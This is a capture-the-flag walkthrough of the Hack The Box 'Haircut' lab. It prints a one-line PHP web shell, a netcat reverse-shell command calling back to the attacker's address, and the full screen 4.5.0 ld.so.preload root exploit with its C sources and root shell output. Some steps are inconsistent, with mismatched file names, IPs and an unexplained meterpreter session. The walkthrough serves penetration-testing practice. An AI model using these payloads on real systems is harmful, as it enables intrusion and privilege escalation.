HTB – Haircut

Hello friends!! Today we are going to solve another CTF challenge “Haircut” which is categories as retired lab presented by Hack the Box for making online penetration practices. Solving challenges in this lab is not that much easy until you don’t have some knowledge of WAPT. Let start and learn how to analyse any vulnerability in a network then exploit it for retrieving desired information.

Level: Intermediate

Task: find user.txt and root.txt file on victim’s machine.

Since these labs are online accessible therefore they have static IP. The IP of Haircut is 10.10.10.24 so let’s initiate with nmap port enumeration.

From given below image, you can observe we found port 22 and 80 are open in victim’s network.

Knowing port 80 is open to victim’s network we preferred to explore his IP in a browser and the following image as shown below.

Then I preferred to use dirbuster tool and chose directory list 2-3 medium.txt file for directory brute force attack on http://10.10.10.24 for PHP file extension.

As a result, it found uploads directory with 403 response and an exposed.php file with 200 ok response.

When we explored http://10.10.10.24/exposed.php we found a search page for finding the location of any hairdresser’s.

• Visit http://10.10.10.24/exposed.php
• You will find it executes a curl script behind.
• There’s folder called /uploads available. Let’s upload our paylaod here.
• Without wasting time I used my PHP backdoor puck.php

  GIF8
  <?php echo system($_REQUEST['puck']); ?>

http://10.10.14.28/puck.php -o uploads/puck.php

• Execute the payload by visiting http://10.10.15.16/uploads/payload.php

Now we need to transfer our backdoor file to target system therefore first we need to run python server on port 80 using the following command.

python -m SimpleHTTPServer 80

As puck.php file is successfully transferred into target’s system but we need to execute that file for getting reverse connection, therefore, I simply run following the path in a web browser.

http://10.10.10.24/uploads/puck.php?puck=nc -e /bin/sh 10.10.14.28 9876

After executing uploaded backdoor file come back to the netcat listener

D:\>nc -lvp 9876
listening on [any] 9876 ...
10.10.10.24: inverse host lookup failed: h_errno 11004: NO_DATA
connect to [10.10.14.28] from (UNKNOWN) [10.10.10.24] 46564: NO_DATA
ls
bounce.jpg
puck.php
python3 -c 'import pty;pty.spawn("/bin/bash")'

Now let’s finished the task by grabbing user.txt and root.txt file. First I move into home directory and check available files and directories inside it.

here I got a directory maria and after exploring it we found so many files and directory, at last I fetch user.txt file from inside /maria/Desktop/ and use cat command for reading.

our 1^st challenges finished successfully now move for 2^ndchallenge.

Then using the following command we got all files and directories having root permission.

Here I notice /usr/bin/screen-4.5.0 now let’s check its exploit if available.

In a new terminal, we look for any exploit present in exploitdb for screen 4.5.0 with help of searchsploit.

From given below image you can observe the highlighted exploit 41154.sh which is a shell script for local privilege escalation.

When I didn’t find any appropriate method to execute this shell script for post exploitation then I go with manual compilation and review its code using cat command.

If you will notice following code then you will observe this script is written in C language and we have divided it into three part for manual compilation.

• Copy Yellow highlighted the code and past it in a text document and save it as libhax.c
• Copy Orange highlighted the code and past it in a text document and save it as rootshell.c

At last copy remaining code and past it in a text document and save it as 41154.sh

From given below image you can see I have pasted above copied inside rootshell.c

#include <stdio.h>
int main(void){
setuid(0);
setgid(0);
seteuid(0);
setegid(0);
execvp("/bin/sh", NULL, NULL);
}

From given below image you can see I have pasted above copied inside libhax.c

#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
__attribute__ ((__constructor__))
void dropshell(void){
chown("/tmp/rootshell", 0, 0);
chmod("/tmp/rootshell", 04755);
unlink("/etc/ld.so.preload");
printf("[+] done!\n");
}

From given below image you can see I have paste above remaining copied inside 41154.sh and save all three text document on the desktop in a new folder shell.

#!/bin/bash
# screenroot.sh
# setuid screen v4.5.0 local root exploit
# abuses ld.so.preload overwriting to get root.
# bug: https://lists.gnu.org/archive/html/screen-devel/2017-01/msg00025.html
# HACK THE PLANET
# ~ infodox (25/1/2017) 
cd /etc
umask 000 # because
screen -D -m -L ld.so.preload echo -ne "\x0a/tmp/libhax.so" # newline needed
echo "[+] Triggering..."
screen -ls # screen itself is setuid, so... 
/tmp/rootshell

Let’s compile our C program file manually in our local system using gcc as given below.

Similarly compile rootshell.c file through the following command.

From given below image you can see all files we have stored in our folder shell, now let’s upload them into target’s system through our previous meterpreter session.

Since we /tmp has read and write permission, therefore, we are uploading all files in /tmp directory by executing following command.

Again for spawning proper tty shell of target’s system, we need to import python file, therefore, I run following command inside meterpreter shell

Open 41154.sh file as it contains a command for getting root privilege as shown below.

Execute following command and get the root.

Here I got root.txt file now using cat command let open this file and finished our 2^nd challenge.

$ /tmp/rootshell
/tmp/rootshell
# id
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
# cd /root
cd /root
# ls
ls
root.txt
# cat root.txt
cat root.txt
4c---------51
#

Wonderful!! We had completed the task and hacked this box.

Author: AArti Singh